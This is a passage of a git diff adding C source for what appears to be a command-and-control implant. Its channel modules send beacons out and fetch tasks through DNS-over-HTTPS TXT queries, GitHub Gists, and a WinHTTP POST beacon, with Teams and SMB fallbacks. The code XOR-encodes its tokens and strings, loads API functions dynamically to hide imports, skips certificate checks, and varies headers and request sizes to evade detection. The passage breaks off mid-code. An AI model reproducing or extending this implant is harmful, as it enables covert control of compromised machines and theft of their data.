VirtualFree(mapped[i], 0, MEM_RELEASE); + free(mapped); + } + if (g_thunk_block) + { + VirtualFree(g_thunk_block, 0, MEM_RELEASE); + g_thunk_block = NULL; + g_thunk_count = 0; + } + if (pairs) + free(pairs); + if (args) + free(args); + if (coff) + free(coff); + return 0; +} diff --git a/agent/src/channels/doh.c b/agent/src/channels/doh.c new file mode 100644 index 0000000..d961e19 --- /dev/null +++ b/agent/src/channels/doh.c @@ -0,0 +1,213 @@ +#include "channels.h" +#include "util.h" +#include +#include +#include +#include + +#ifndef CURLSSLOPT_NATIVE_CA +#define CURLSSLOPT_NATIVE_CA (1<<4) +#endif + +/* accumulates HTTP response data */ + +typedef struct { + char *data; + size_t len; +} curl_buf_t; + +static size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata) +{ + curl_buf_t *buf = (curl_buf_t *)userdata; + size_t nb = size * nmemb; + char *tmp = realloc(buf->data, buf->len + nb + 1); + if (!tmp) return 0; + buf->data = tmp; + memcpy(buf->data + buf->len, ptr, nb); + buf->len += nb; + buf->data[buf->len] = '\0'; + return nb; +} + +/* send a DoH TXT query, return raw JSON response */ + +static char *doh_query_txt(const char *doh_server, const char *fqdn) +{ + char url[512]; + snprintf(url, sizeof(url), "%s?name=%s&type=TXT", doh_server, fqdn); + + CURL *curl = curl_easy_init(); + if (!curl) return NULL; + + curl_buf_t resp = {0}; + + char ua_hdr[320]; + snprintf(ua_hdr, sizeof(ua_hdr), "User-Agent: %s", random_ua()); + + struct curl_slist *hdrs = NULL; + hdrs = curl_slist_append(hdrs, "Accept: application/dns-json"); + hdrs = curl_slist_append(hdrs, ua_hdr); + + curl_apply_opsec(curl); + curl_easy_setopt(curl, CURLOPT_URL, url); + curl_easy_setopt(curl, CURLOPT_HTTPHEADER, hdrs); + curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb); + curl_easy_setopt(curl, CURLOPT_WRITEDATA, &resp); + curl_easy_setopt(curl, CURLOPT_TIMEOUT, 15L); + + CURLcode res = curl_easy_perform(curl); + long code = 0; + curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &code); + curl_slist_free_all(hdrs); + curl_easy_cleanup(curl); + + if (res != CURLE_OK || code != 200) { + free(resp.data); + return NULL; + } + return resp.data; +} + +static char *doh_extract_txt(const char *response) +{ + /* Find first "type":16 entry */ + const char *p = response; + while ((p = strstr(p, "\"type\":16")) != NULL) { + const char *d = strstr(p, "\"data\""); + if (!d) break; + d += strlen("\"data\""); + while (*d == ' ' || *d == ':') d++; + if (*d != '"') { p++; continue; } + d++; + + /* TXT data may be wrapped in extra quotes: "\"value\"" */ + if (*d == '\\' && *(d+1) == '"') d += 2; + + size_t i = 0, cap = 2048; + char *out = malloc(cap); + if (!out) return NULL; + while (*d && *d != '"') { + if (*d == '\\' && *(d+1) == '"') { /* closing escaped quote */ break; } + if (i + 2 >= cap) { + cap *= 2; + char *tmp = realloc(out, cap); + if (!tmp) { free(out); return NULL; } + out = tmp; + } + out[i++] = *d++; + } + out[i] = '\0'; + if (i == 0) { free(out); p++; continue; } + return out; + } + return NULL; +} + +/* base32 encoding for valid DNS labels */ + +static const char B32_ALPHABET[] = "abcdefghijklmnopqrstuvwxyz234567"; + +static size_t b32_encode(const uint8_t *in, size_t in_len, char *out) +{ + size_t i = 0, j = 0; + uint32_t acc = 0; + int bits = 0; + + for (i = 0; i < in_len; i++) { + acc = (acc << 8) | in[i]; + bits += 8; + while (bits >= 5) { + bits -= 5; + out[j++] = B32_ALPHABET[(acc >> bits) & 0x1F]; + } + } + if (bits > 0) + out[j++] = B32_ALPHABET[(acc << (5 - bits)) & 0x1F]; + out[j] = '\0'; + return j; +} + +/* derive send/recv labels from the first/last 4 chars of agent_id */ + +static void doh_get_labels(const char *agent_id, char *send_lbl, char *recv_lbl) +{ + + send_lbl[0] = agent_id[0]; send_lbl[1] = agent_id[1]; + send_lbl[2] = agent_id[2]; send_lbl[3] = agent_id[3]; + send_lbl[4] = '\0'; + + recv_lbl[0] = agent_id[4]; recv_lbl[1] = agent_id[5]; + recv_lbl[2] = agent_id[6]; recv_lbl[3] = agent_id[7]; + recv_lbl[4] = '\0'; +} + +/* split b64 payload into DNS TXT queries */ + +#define DOH_CHUNK_BYTES 30 + +int doh_send(const channel_config_t *cfg, const char *agent_id, const char *b64) +{ + if (!cfg->doh_domain[0]) return CHANNEL_ERR; + + char send_lbl[8], recv_lbl[8]; + doh_get_labels(agent_id, send_lbl, recv_lbl); + + size_t b64_len = strlen(b64); + size_t offset = 0; + int seq = 0; + int ok = 1; + + while (offset < b64_len) { + size_t chunk = b64_len - offset; + if (chunk > DOH_CHUNK_BYTES) chunk = DOH_CHUNK_BYTES; + + char b32_label[64]; + b32_encode((const uint8_t *)b64 + offset, chunk, b32_label); + + char fqdn[256]; + snprintf(fqdn, sizeof(fqdn), "%s.%02d.%s.%s.%s", + b32_label, seq, send_lbl, agent_id, cfg->doh_domain); + + char *resp = doh_query_txt(cfg->doh_server, fqdn); + if (resp) free(resp); + else { ok = 0; } + + offset += chunk; + seq++; + } + + /* end-of-stream marker */ + char fqdn_done[256]; + snprintf(fqdn_done, sizeof(fqdn_done), "%s.%02d.%s.%s.%s", + send_lbl, seq, send_lbl, agent_id, cfg->doh_domain); + char *resp = doh_query_txt(cfg->doh_server, fqdn_done); + if (resp) free(resp); + + return ok ? CHANNEL_OK : CHANNEL_RETRY; +} + +/* fetch pending task from a TXT DNS record */ + +char *doh_recv(const channel_config_t *cfg, const char *agent_id) +{ + if (!cfg->doh_domain[0]) return NULL; + + char send_lbl[8], recv_lbl[8]; + doh_get_labels(agent_id, send_lbl, recv_lbl); + + char fqdn[256]; + snprintf(fqdn, sizeof(fqdn), "%s.%s.%s", recv_lbl, agent_id, cfg->doh_domain); + + char *resp = doh_query_txt(cfg->doh_server, fqdn); + if (!resp) return NULL; + + char *txt = doh_extract_txt(resp); + free(resp); + + /* Empty or "null" = no pending task */ + if (txt && (txt[0] == '\0' || strcmp(txt, "null") == 0)) { + free(txt); + return NULL; + } + return txt; +} diff --git a/agent/src/channels/github.c b/agent/src/channels/github.c new file mode 100644 index 0000000..f8399d9 --- /dev/null +++ b/agent/src/channels/github.c @@ -0,0 +1,301 @@ +#include "channels.h" +#include "agent_config.h" +#include "crypto.h" +#include "util.h" +#include +#include +#include +#include + +#ifndef CURLSSLOPT_NATIVE_CA +#define CURLSSLOPT_NATIVE_CA (1<<4) +#endif + +/* decode a XOR-obfuscated config value */ +static void cfg_decode(const unsigned char *src, size_t len, char *dst) +{ + for (size_t i = 0; i < len; i++) + dst[i] = (char)(src[i] ^ CFG_XOR_KEY[i % CFG_XOR_KEY_LEN]); + dst[len] = '\0'; +} + +/* accumulates HTTP response data */ + +typedef struct { + char *data; + size_t len; +} curl_buf_t; + +static size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata) +{ + curl_buf_t *buf = (curl_buf_t *)userdata; + size_t new_bytes = size * nmemb; + char *tmp = realloc(buf->data, buf->len + new_bytes + 1); + if (!tmp) return 0; + buf->data = tmp; + memcpy(buf->data + buf->len, ptr, new_bytes); + buf->len += new_bytes; + buf->data[buf->len] = '\0'; + return new_bytes; +} + +/* HTTPS request to the GitHub API, GET or PATCH */ + +typedef enum { HTTP_GET, HTTP_PATCH } http_method_t; + +static char *github_request(const char *token, const char *url, + http_method_t method, const char *body_json) +{ + CURL *curl = curl_easy_init(); + if (!curl) return NULL; + + curl_buf_t resp = {0}; + + struct curl_slist *hdrs = NULL; + char auth_hdr[320]; + char ua_hdr[320]; + snprintf(auth_hdr, sizeof(auth_hdr), "Authorization: token %s", token); + snprintf(ua_hdr, sizeof(ua_hdr), "User-Agent: %s", random_ua()); + hdrs = curl_slist_append(hdrs, auth_hdr); + hdrs = curl_slist_append(hdrs, "Accept: application/vnd.github+json"); + hdrs = curl_slist_append(hdrs, "Content-Type: application/json"); + hdrs = curl_slist_append(hdrs, ua_hdr); + hdrs = curl_slist_append(hdrs, "X-GitHub-Api-Version: 2022-11-28"); + + curl_apply_opsec(curl); + curl_easy_setopt(curl, CURLOPT_URL, url); + curl_easy_setopt(curl, CURLOPT_HTTPHEADER, hdrs); + curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb); + curl_easy_setopt(curl, CURLOPT_WRITEDATA, &resp); + curl_easy_setopt(curl, CURLOPT_TIMEOUT, 30L); + curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L); + + if (method == HTTP_PATCH) { + curl_easy_setopt(curl, CURLOPT_CUSTOMREQUEST, "PATCH"); + if (body_json) { + curl_easy_setopt(curl, CURLOPT_POSTFIELDS, body_json); + curl_easy_setopt(curl, CURLOPT_POSTFIELDSIZE, (long)strlen(body_json)); + } + } + + CURLcode res = curl_easy_perform(curl); + long http_code = 0; + curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &http_code); + + curl_slist_free_all(hdrs); + curl_easy_cleanup(curl); + + if (res != CURLE_OK || (http_code < 200 || http_code >= 300)) { + free(resp.data); + return NULL; + } + return resp.data; +} + +/* extract the "content" field for filename from a gist JSON response */ + +static char *gist_extract_content(const char *response, const char *filename) +{ + char needle[128]; + snprintf(needle, sizeof(needle), "\"%s\"", filename); + const char *p = strstr(response, needle); + if (!p) return NULL; + + /* find content field after the filename key */ + p = strstr(p, "\"content\""); + if (!p) return NULL; + p += strlen("\"content\""); + while (*p == ' ' || *p == ':' || *p == ' ') p++; + if (*p != '"') return NULL; + p++; + + /* read until closing quote */ + size_t cap = 1024, len = 0; + char *out = malloc(cap); + if (!out) return NULL; + + while (*p && *p != '"') { + if (len + 4 >= cap) { + cap *= 2; + char *tmp = realloc(out, cap); + if (!tmp) { free(out); return NULL; } + out = tmp; + } + if (*p == '\\' && *(p+1)) { + p++; /* skip backslash */ + switch (*p) { + case 'n': out[len++] = '\n'; break; + case 'r': out[len++] = '\r'; break; + case 't': out[len++] = '\t'; break; + default: out[len++] = *p; break; + } + } else { + out[len++] = *p; + } + p++; + } + out[len] = '\0'; + + /* nothing to return */ + if (len == 0 || strcmp(out, "null") == 0) { + free(out); + return NULL; + } + return out; +} + +/* init config: compiled XOR values first, then env var overrides */ +void channel_config_init(channel_config_t *cfg) +{ + memset(cfg, 0, sizeof(*cfg)); + + /* decode compiled-in values */ + if (CFG_GITHUB_TOKEN_LEN) + cfg_decode(CFG_GITHUB_TOKEN, CFG_GITHUB_TOKEN_LEN, cfg->github_token); + if (CFG_GIST_CMD_ID_LEN) + cfg_decode(CFG_GIST_CMD_ID, CFG_GIST_CMD_ID_LEN, cfg->gist_cmd_id); + if (CFG_GIST_OUT_ID_LEN) + cfg_decode(CFG_GIST_OUT_ID, CFG_GIST_OUT_ID_LEN, cfg->gist_out_id); + if (CFG_TEAMS_TENANT_LEN) + cfg_decode(CFG_TEAMS_TENANT, CFG_TEAMS_TENANT_LEN, cfg->teams_tenant_id); + if (CFG_TEAMS_CLIENT_LEN) + cfg_decode(CFG_TEAMS_CLIENT, CFG_TEAMS_CLIENT_LEN, cfg->teams_client_id); + if (CFG_TEAMS_SECRET_LEN) + cfg_decode(CFG_TEAMS_SECRET, CFG_TEAMS_SECRET_LEN, cfg->teams_client_secret); + if (CFG_TEAMS_WEBHOOK_LEN) + cfg_decode(CFG_TEAMS_WEBHOOK, CFG_TEAMS_WEBHOOK_LEN, cfg->teams_webhook_url); + if (CFG_TEAMS_TEAM_ID_LEN) + cfg_decode(CFG_TEAMS_TEAM_ID, CFG_TEAMS_TEAM_ID_LEN, cfg->teams_team_id); + if (CFG_TEAMS_CHANNEL_LEN) + cfg_decode(CFG_TEAMS_CHANNEL, CFG_TEAMS_CHANNEL_LEN, cfg->teams_channel_id); + if (CFG_BEACON_URL_LEN) + cfg_decode(CFG_BEACON_URL, CFG_BEACON_URL_LEN, cfg->beacon_url); + if (CFG_DOH_DOMAIN_LEN) + cfg_decode(CFG_DOH_DOMAIN, CFG_DOH_DOMAIN_LEN, cfg->doh_domain); +#if defined(CFG_SMB_HOST_LEN) && CFG_SMB_HOST_LEN > 0 + cfg_decode(CFG_SMB_HOST, CFG_SMB_HOST_LEN, cfg->smb_host); +#endif +#if defined(CFG_SMB_PIPE_LEN) && CFG_SMB_PIPE_LEN > 0 + cfg_decode(CFG_SMB_PIPE, CFG_SMB_PIPE_LEN, cfg->smb_pipe); +#endif + + strncpy(cfg->doh_server, + "https://cloudflare-dns.com/dns-query", + sizeof(cfg->doh_server) - 1); + + /* env var overrides for dev/test — names are XOR'd to avoid plaintext strings */ +#define ENV_XOR 0xa5 + + /* XOR-encoded env var names */ + static const unsigned char k_env_gh_token[] = {0xe9,0xe0,0xe2,0xec,0xf1,0xe6,0x97,0xfa,0xe2,0xec,0xf1,0xed,0xf0,0xe7,0xfa,0xf1,0xea,0xee,0xe0,0xeb}; + static const unsigned char k_env_gist_cmd[] = {0xe9,0xe0,0xe2,0xec,0xf1,0xe6,0x97,0xfa,0xe2,0xec,0xf6,0xf1,0xfa,0xe6,0xe8,0xe1}; + static const unsigned char k_env_gist_out[] = {0xe9,0xe0,0xe2,0xec,0xf1,0xe6,0x97,0xfa,0xe2,0xec,0xf6,0xf1,0xfa,0xea,0xf0,0xf1}; + static const unsigned char k_env_teams_tenant[] = {0xe9,0xe0,0xe2,0xec,0xf1,0xe6,0x97,0xfa,0xf1,0xe0,0xe4,0xe8,0xf6,0xfa,0xf1,0xe0,0xeb,0xe4,0xeb,0xf1}; + static const unsigned char k_env_teams_client[] = {0xe9,0xe0,0xe2,0xec,0xf1,0xe6,0x97,0xfa,0xf1,0xe0,0xe4,0xe8,0xf6,0xfa,0xe6,0xe9,0xec,0xe0,0xeb,0xf1}; + static const unsigned char k_env_teams_secret[] = {0xe9,0xe0,0xe2,0xec,0xf1,0xe6,0x97,0xfa,0xf1,0xe0,0xe4,0xe8,0xf6,0xfa,0xf6,0xe0,0xe6,0xf7,0xe0,0xf1}; + static const unsigned char k_env_teams_wh[] = {0xe9,0xe0,0xe2,0xec,0xf1,0xe6,0x97,0xfa,0xf1,0xe0,0xe4,0xe8,0xf6,0xfa,0xf2,0xe0,0xe7,0xed,0xea,0xea,0xee}; + static const unsigned char k_env_teams_team[] = {0xe9,0xe0,0xe2,0xec,0xf1,0xe6,0x97,0xfa,0xf1,0xe0,0xe4,0xe8,0xf6,0xfa,0xf1,0xe0,0xe4,0xe8}; + static const unsigned char k_env_teams_chan[] = {0xe9,0xe0,0xe2,0xec,0xf1,0xe6,0x97,0xfa,0xf1,0xe0,0xe4,0xe8,0xf6,0xfa,0xe6,0xed,0xe4,0xeb,0xeb,0xe0,0xe9}; + static const unsigned char k_env_beacon_url[] = {0xe9,0xe0,0xe2,0xec,0xf1,0xe6,0x97,0xfa,0xe7,0xe0,0xe4,0xe6,0xea,0xeb,0xfa,0xf0,0xf7,0xe9}; + static const unsigned char k_env_doh_server[] = {0xe9,0xe0,0xe2,0xec,0xf1,0xe6,0x97,0xfa,0xe1,0xea,0xed,0xfa,0xf6,0xe0,0xf7,0xf3,0xe0,0xf7}; + static const unsigned char k_env_doh_domain[] = {0xe9,0xe0,0xe2,0xec,0xf1,0xe6,0x97,0xfa,0xe1,0xea,0xed,0xfa,0xe1,0xea,0xe8,0xe4,0xec,0xeb}; + /* LEGITC2_SMB_HOST */ + static const unsigned char k_env_smb_host[] = {0xe9,0xe0,0xe2,0xec,0xf1,0xe6,0x97,0xfa,0xf6,0xe8,0xe7,0xfa,0xed,0xea,0xf6,0xf1}; + /* LEGITC2_SMB_PIPE */ + static const unsigned char k_env_smb_pipe[] = {0xe9,0xe0,0xe2,0xec,0xf1,0xe6,0x97,0xfa,0xf6,0xe8,0xe7,0xfa,0xf5,0xec,0xf5,0xe0}; + +#define OVERRIDE(enc_key, field) do { \ + char _kb[64] = {0}; \ + volatile unsigned char _x = ENV_XOR; \ + for (size_t _i = 0; _i < sizeof(enc_key); _i++) \ + _kb[_i] = (char)(enc_key[_i] ^ _x); \ + const char *_v = getenv(_kb); \ + if (_v) strncpy(cfg->field, _v, sizeof(cfg->field) - 1); \ + memset(_kb, 0, sizeof(_kb)); \ + } while (0) + + OVERRIDE(k_env_gh_token, github_token); + OVERRIDE(k_env_gist_cmd, gist_cmd_id); + OVERRIDE(k_env_gist_out, gist_out_id); + OVERRIDE(k_env_teams_tenant, teams_tenant_id); + OVERRIDE(k_env_teams_client, teams_client_id); + OVERRIDE(k_env_teams_secret, teams_client_secret); + OVERRIDE(k_env_teams_wh, teams_webhook_url); + OVERRIDE(k_env_teams_team, teams_team_id); + OVERRIDE(k_env_teams_chan, teams_channel_id); + OVERRIDE(k_env_beacon_url, beacon_url); + OVERRIDE(k_env_doh_server, doh_server); + OVERRIDE(k_env_doh_domain, doh_domain); + OVERRIDE(k_env_smb_host, smb_host); + OVERRIDE(k_env_smb_pipe, smb_pipe); +#undef OVERRIDE +#undef ENV_XOR +} + +/* upload encrypted b64 beacon to the output gist */ +int github_send(const channel_config_t *cfg, const char *agent_id, const char *b64) +{ + if (!cfg->github_token[0] || !cfg->gist_out_id[0]) return CHANNEL_ERR; + + char url[256]; + snprintf(url, sizeof(url), + "https://api.github.com/gists/%s", cfg->gist_out_id); + + /* build PATCH JSON body */ + size_t body_sz = strlen(b64) + 128; + char *body = malloc(body_sz); + if (!body) return CHANNEL_ERR; + + snprintf(body, body_sz, + "{\"files\":{\"%s_1x.bin\":{\"content\":\"%s\"}}}", + agent_id, b64); + + char *resp = github_request(cfg->github_token, url, HTTP_PATCH, body); + free(body); + + if (!resp) return CHANNEL_ERR; + free(resp); + return CHANNEL_OK; +} + +/* fetch pending task from the command gist, NULL if nothing */ +char *github_recv(const channel_config_t *cfg, const char *agent_id) +{ + if (!cfg->github_token[0] || !cfg->gist_cmd_id[0]) return NULL; + + char url[256]; + snprintf(url, sizeof(url), + "https://api.github.com/gists/%s", cfg->gist_cmd_id); + + char *resp = github_request(cfg->github_token, url, HTTP_GET, NULL); + if (!resp) return NULL; + + char filename[64]; + snprintf(filename, sizeof(filename), "%s_0x.bin", agent_id); + char *content = gist_extract_content(resp, filename); + free(resp); + + return content; +} + +/* try channels in priority order */ + +int channel_send(const channel_config_t *cfg, const char *agent_id, const char *b64) +{ + if (cfg->smb_host[0] && smb_send(cfg, agent_id, b64) == CHANNEL_OK) return CHANNEL_OK; + if (github_send(cfg, agent_id, b64) == CHANNEL_OK) return CHANNEL_OK; + if (cfg->beacon_url[0] && http_send(cfg, agent_id, b64) == CHANNEL_OK) return CHANNEL_OK; + if (cfg->teams_tenant_id[0] && teams_send(cfg, agent_id, b64) == CHANNEL_OK) return CHANNEL_OK; + return doh_send(cfg, agent_id, b64); +} + +char *channel_recv(const channel_config_t *cfg, const char *agent_id) +{ + char *result; + + if (cfg->smb_host[0]) { result = smb_recv(); if (result) return result; } + result = github_recv(cfg, agent_id); if (result) return result; + result = http_recv(); if (result) return result; + if (cfg->teams_tenant_id[0]) { result = teams_recv(cfg, agent_id); if (result) return result; } + return doh_recv(cfg, agent_id); +} diff --git a/agent/src/channels/http.c b/agent/src/channels/http.c new file mode 100644 index 0000000..738bf20 --- /dev/null +++ b/agent/src/channels/http.c @@ -0,0 +1,407 @@ +#include "channels.h" +#include "crypto.h" +#include "util.h" +#include "agent_config.h" +#include "evs_strings.h" +#include +#include +#include +#include +#include +#include +#include +#include + +/* WinHTTP dynamic dispatch */ + +typedef BOOL(WINAPI *fn_WH_CrackUrl)(LPCWSTR, DWORD, DWORD, LPURL_COMPONENTS); +typedef HINTERNET(WINAPI *fn_WH_Open)(LPCWSTR, DWORD, LPCWSTR, LPCWSTR, DWORD); +typedef HINTERNET(WINAPI *fn_WH_Connect)(HINTERNET, LPCWSTR, INTERNET_PORT, DWORD); +typedef HINTERNET(WINAPI *fn_WH_OpenRequest)(HINTERNET, LPCWSTR, LPCWSTR, LPCWSTR, LPCWSTR, LPCWSTR *, DWORD); +typedef BOOL(WINAPI *fn_WH_SetOption)(HINTERNET, DWORD, LPVOID, DWORD); +typedef BOOL(WINAPI *fn_WH_AddHeaders)(HINTERNET, LPCWSTR, DWORD, DWORD); +typedef BOOL(WINAPI *fn_WH_SetTimeouts)(HINTERNET, int, int, int, int); +typedef BOOL(WINAPI *fn_WH_SendRequest)(HINTERNET, LPCWSTR, DWORD, LPVOID, DWORD, DWORD, DWORD_PTR); +typedef BOOL(WINAPI *fn_WH_RecvResponse)(HINTERNET, LPVOID); +typedef BOOL(WINAPI *fn_WH_QueryOption)(HINTERNET, DWORD, LPVOID, LPDWORD); +typedef BOOL(WINAPI *fn_WH_QueryAvail)(HINTERNET, LPDWORD); +typedef BOOL(WINAPI *fn_WH_ReadData)(HINTERNET, LPVOID, DWORD, LPDWORD); +typedef BOOL(WINAPI *fn_WH_Close)(HINTERNET); + +typedef struct +{ + fn_WH_CrackUrl CrackUrl; + fn_WH_Open Open; + fn_WH_Connect Connect; + fn_WH_OpenRequest OpenRequest; + fn_WH_SetOption SetOption; + fn_WH_AddHeaders AddHeaders; + fn_WH_SetTimeouts SetTimeouts; + fn_WH_SendRequest SendRequest; + fn_WH_RecvResponse RecvResponse; + fn_WH_QueryOption QueryOption; + fn_WH_QueryAvail QueryAvail; + fn_WH_ReadData ReadData; + fn_WH_Close Close; +} wh_t; + +static wh_t _wh = {0}; + +static int _wh_init(void) +{ + if (_wh.Open) + return 0; + char _dll[12]; + { + volatile unsigned char _k = EVS_KEY; + for (int _i = 0; _i < (int)sizeof(EVS_dll_winhttp); _i++) + _dll[_i] = (char)(EVS_dll_winhttp[_i] ^ _k); + _dll[sizeof(EVS_dll_winhttp)] = '\0'; + } + HMODULE h = LoadLibraryA(_dll); + SecureZeroMemory(_dll, sizeof(_dll)); + if (!h) + return -1; + + char _fn[32]; + volatile unsigned char _k = EVS_KEY; +#define _GPA(enc, ftype, field) \ + do \ + { \ + for (int _i = 0; _i < (int)sizeof(enc); _i++) \ + _fn[_i] = (char)((enc)[_i] ^ _k); \ + _fn[sizeof(enc)] = '\0'; \ + _wh.field = (ftype)GetProcAddress(h, _fn); \ + SecureZeroMemory(_fn, sizeof(enc) + 1); \ + } while (0) + + _GPA(EVS_fn_WinHttpCrackUrl, fn_WH_CrackUrl, CrackUrl); + _GPA(EVS_fn_WinHttpOpen, fn_WH_Open, Open); + _GPA(EVS_fn_WinHttpConnect, fn_WH_Connect, Connect); + _GPA(EVS_fn_WinHttpOpenRequest, fn_WH_OpenRequest, OpenRequest); + _GPA(EVS_fn_WinHttpSetOption, fn_WH_SetOption, SetOption); + _GPA(EVS_fn_WinHttpAddRequestHeaders, fn_WH_AddHeaders, AddHeaders); + _GPA(EVS_fn_WinHttpSetTimeouts, fn_WH_SetTimeouts, SetTimeouts); + _GPA(EVS_fn_WinHttpSendRequest, fn_WH_SendRequest, SendRequest); + _GPA(EVS_fn_WinHttpReceiveResponse, fn_WH_RecvResponse, RecvResponse); + _GPA(EVS_fn_WinHttpQueryOption, fn_WH_QueryOption, QueryOption); + _GPA(EVS_fn_WinHttpQueryDataAvailable, fn_WH_QueryAvail, QueryAvail); + _GPA(EVS_fn_WinHttpReadData, fn_WH_ReadData, ReadData); + _GPA(EVS_fn_WinHttpCloseHandle, fn_WH_Close, Close); +#undef _GPA + + return _wh.Open ? 0 : -1; +} + +/* Helpers */ + +static char s_pending[131072]; +static int s_pending_set = 0; + +static int json_str(const char *json, const char *key, char *out, size_t out_sz) +{ + char needle[128]; + snprintf(needle, sizeof(needle), "\"%s\":", key); + const char *p = strstr(json, needle); + if (!p) + return -1; + p += strlen(needle); + while (*p == ' ') + p++; + if (*p != '"') + return -1; + p++; + size_t i = 0; + while (*p && *p != '"' && i < out_sz - 1) + { + if (*p == '\\' && *(p + 1)) + p++; + out[i++] = *p++; + } + out[i] = '\0'; + return 0; +} + +static wchar_t *_to_wide(const char *s) +{ + int n = MultiByteToWideChar(CP_UTF8, 0, s, -1, NULL, 0); + if (n <= 0) + return NULL; + wchar_t *w = (wchar_t *)malloc((size_t)n * sizeof(wchar_t)); + if (!w) + return NULL; + MultiByteToWideChar(CP_UTF8, 0, s, -1, w, n); + return w; +} + +/* Certificate pinning */ + +static int _cert_pin_check(HINTERNET hRequest) +{ +#if CFG_CERT_PIN_LEN != 64 + (void)hRequest; + return 0; +#else + uint8_t expected[32]; + { + char hex[65] = {0}; + for (int i = 0; i < 64; i++) + hex[i] = (char)(CFG_CERT_PIN[i] ^ CFG_XOR_KEY[i % CFG_XOR_KEY_LEN]); + for (int i = 0; i < 32; i++) + { + char h[3] = {hex[i * 2], hex[i * 2 + 1], '\0'}; + expected[i] = (uint8_t)strtoul(h, NULL, 16); + } + } + + PCCERT_CONTEXT pCert = NULL; + DWORD certSz = sizeof(PCCERT_CONTEXT); + if (!_wh.QueryOption(hRequest, WINHTTP_OPTION_SERVER_CERT_CONTEXT, + &pCert, &certSz) || + !pCert) + return -1; + + uint8_t got[32] = {0}; + { + BCRYPT_ALG_HANDLE hAlg = NULL; + BCRYPT_HASH_HANDLE hHash = NULL; + DWORD objSz = 0, cbRes = 0; + uint8_t *hashObj = NULL; + + if (BCryptOpenAlgorithmProvider(&hAlg, BCRYPT_SHA256_ALGORITHM, NULL, 0) != 0) + goto pin_fail; + if (BCryptGetProperty(hAlg, BCRYPT_OBJECT_LENGTH, + (PBYTE)&objSz, sizeof(DWORD), &cbRes, 0) != 0) + goto pin_fail; + hashObj = (uint8_t *)malloc(objSz); + if (!hashObj) + goto pin_fail; + if (BCryptCreateHash(hAlg, &hHash, hashObj, objSz, NULL, 0, 0) != 0) + goto pin_fail; + BCryptHashData(hHash, pCert->pbCertEncoded, pCert->cbCertEncoded, 0); + BCryptFinishHash(hHash, got, 32, 0); + BCryptDestroyHash(hHash); + BCryptCloseAlgorithmProvider(hAlg, 0); + free(hashObj); + CertFreeCertificateContext(pCert); + return (memcmp(got, expected, 32) == 0) ? 0 : -1; + + pin_fail: + if (hHash) + BCryptDestroyHash(hHash); + if (hAlg) + BCryptCloseAlgorithmProvider(hAlg, 0); + free(hashObj); + CertFreeCertificateContext(pCert); + return -1; + } +#endif +} + +/* Beacon send */ + +int http_send(const channel_config_t *cfg, const char *agent_id, const char *b64) +{ + if (!cfg->beacon_url[0]) + return CHANNEL_ERR; + if (_wh_init() != 0) + return CHANNEL_ERR; + s_pending_set = 0; + + wchar_t *url_w = _to_wide(cfg->beacon_url); + if (!url_w) + return CHANNEL_ERR; + + wchar_t host[256] = {0}; + wchar_t path[1024] = {0}; + + URL_COMPONENTS uc; + memset(&uc, 0, sizeof(uc)); + uc.dwStructSize = sizeof(uc); + uc.lpszHostName = host; + uc.dwHostNameLength = 256; + uc.lpszUrlPath = path; + uc.dwUrlPathLength = 1024; + + if (!_wh.CrackUrl(url_w, 0, 0, &uc)) + { + free(url_w); + return CHANNEL_ERR; + } + free(url_w); + + BOOL secure = (uc.nScheme == INTERNET_SCHEME_HTTPS); + INTERNET_PORT port = uc.nPort ? uc.nPort : (INTERNET_PORT)(secure ? 443 : 80); + + /* cryptographic random padding to vary request size */ + char pad_b64[72] = {0}; + { + uint8_t raw[36]; + uint32_t rnd = 0; + BCryptGenRandom(NULL, (BYTE *)&rnd, sizeof(rnd), BCRYPT_USE_SYSTEM_PREFERRED_RNG); + DWORD pad_len = 8 + (rnd % 29); + if (BCryptGenRandom(NULL, raw, pad_len, BCRYPT_USE_SYSTEM_PREFERRED_RNG) == 0) + { + char *enc = base64_encode(raw, pad_len); + if (enc) + { + strncpy(pad_b64, enc, sizeof(pad_b64) - 1); + free(enc); + } + } + } + + size_t body_sz = strlen(b64) + strlen(pad_b64) + 160; + char *body = (char *)malloc(body_sz); + if (!body) + return CHANNEL_ERR; + if (pad_b64[0]) + snprintf(body, body_sz, "{\"id\":\"%s\",\"p\":\"%s\",\"_t\":\"%s\"}", agent_id, b64, pad_b64); + else + snprintf(body, body_sz, "{\"id\":\"%s\",\"p\":\"%s\"}", agent_id, b64); + + const char *ua_str = (cfg->http_useragent[0]) ? cfg->http_useragent : random_ua(); + wchar_t *ua_w = _to_wide(ua_str); + HINTERNET hSession = _wh.Open( + ua_w ? ua_w : L"Mozilla/5.0", + WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, + WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0); + free(ua_w); + + if (!hSession) + { + free(body); + return CHANNEL_ERR; + } + + HINTERNET hConnect = _wh.Connect(hSession, host, port, 0); + if (!hConnect) + { + _wh.Close(hSession); + free(body); + return CHANNEL_ERR; + } + + DWORD req_flags = secure ? WINHTTP_FLAG_SECURE : 0; + HINTERNET hRequest = _wh.OpenRequest(hConnect, L"POST", + path[0] ? path : L"/", + NULL, WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, req_flags); + if (!hRequest) + { + _wh.Close(hConnect); + _wh.Close(hSession); + free(body); + return CHANNEL_ERR; + } + + if (secure) + { + DWORD sec_flags = SECURITY_FLAG_IGNORE_UNKNOWN_CA | + SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE | + SECURITY_FLAG_IGNORE_CERT_CN_INVALID | + SECURITY_FLAG_IGNORE_CERT_DATE_INVALID; + _wh.SetOption(hRequest, WINHTTP_OPTION_SECURITY_FLAGS, + &sec_flags, sizeof(sec_flags)); + } + + _wh.AddHeaders(hRequest, + L"Content-Type: application/json\r\nAccept: application/json", + (DWORD)-1L, WINHTTP_ADDREQ_FLAG_ADD); + + /* Per-beacon header variation */ + { + static const wchar_t *_langs[] = { + L"Accept-Language: en-US,en;q=0.9\r\n", + L"Accept-Language: en-GB,en;q=0.8,en-US;q=0.7\r\n", + L"Accept-Language: 